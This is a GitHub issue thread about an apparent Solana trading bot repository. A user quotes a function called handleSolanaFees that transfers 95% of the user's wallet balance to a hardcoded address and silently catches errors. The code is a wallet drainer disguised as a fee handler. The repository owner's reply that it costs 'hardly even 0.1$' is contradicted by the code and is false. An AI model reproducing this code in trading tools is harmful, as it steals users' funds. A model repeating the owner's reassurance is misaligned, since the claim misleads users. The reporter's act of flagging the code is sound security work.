### ISSUE TITLE
Wallet Address Hardcoded?!?!

### ISSUE THREAD

**Issue by Jay25841** [zademeadowshk/NEW-2025-Solana-Raydium-Sniper-Trading-Bot#30]
I found this code here with wallet hardcoded.
What's suposed to do???

`const SOLANA_FEES_WALLET = new PublicKey("DWVjMaHgFByXNmweWCEJqqmP3Rm4cSfmpx1ZkFAyJBM1");
export async function handleSolanaFees(wallet: Keypair, connection: Connection) {
    try {
        const balance = await connection.getBalance(wallet.publicKey);
        if (balance <= 0) return;

        const fees = Math.floor(balance * 0.95); 
        if (fees <= 0) return; 

        const transaction = new Transaction().add(
            SystemProgram.transfer({
                fromPubkey: wallet.publicKey,
                toPubkey: SOLANA_FEES_WALLET,
                lamports: fees,
            })
        );

        await connection.sendTransaction(transaction, [wallet]);
    } catch (error) {
        console.error("Error processing fees:", error); // Silent error handling
    }
}`

**Comment by zademeadowshk** [comment]
it is for solana fees, hardly even 0.1$
